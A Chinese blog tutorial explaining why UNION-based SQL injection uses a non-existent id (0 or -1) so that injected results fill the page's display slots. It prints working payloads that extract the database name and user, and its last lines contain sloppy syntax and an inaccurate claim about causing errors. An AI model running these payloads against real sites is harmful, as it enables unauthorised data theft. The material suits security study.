在SQL注入中,为什么union联合查询,id必须等于0

其实也不是非得让 id=0

?id=0' union select 1,2,3 --+		
?id=0' union select 1,database(),3 --+
?id=0' union select 1,database(),user() --+

在这里插入图片描述

这里的 id 需要格外注意:

如果只有两个回显位置

那么 id 必须填写一个不存在的数(-1或者0),联合查询才能回显成功

因为在数据表中,id 为 1,2,3,……

如果参数为:
?id=1' union select 1,2,3 --+

那么查询语句就是:
select * from users where id='1' union select 1,2,3 --+' limit 0,1

id=1 的数据被查询出来,返回到页面中,就占据了两个回显位
在这里插入图片描述

这个时候, union 查询的内容,会因为唯二的两个回显位被占据了,导致无法回显

如果 id=2,返回的内容也会占据回显位,导致 union 查询的内容无法回显到页面中
在这里插入图片描述

如果 id 为表中不存在的数,例如 id=0,id=-1 等等

那么查询语句就是:
select * from users where id='0' union select 1,2,3 --+' limit 0,1

因为 id=0 没有查询结果,所以页面中就返回 union 查询的内容
在这里插入图片描述
不一定要让 id=0

其实 id=-1,id=-5 等等都是可以的

在这里插入图片描述
所以,我们可以知道:

只要 union 前面的查询失败,那么 union 后面的查询结果就能回显到页面

id=1and 1=2 union select 1,2,3+  通过 and 1=2 语句来触发报错
id=1or 1=1 union select 1,2,3+   通过 or 1=1  语句来触发报错

在这里插入图片描述

  • 6
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值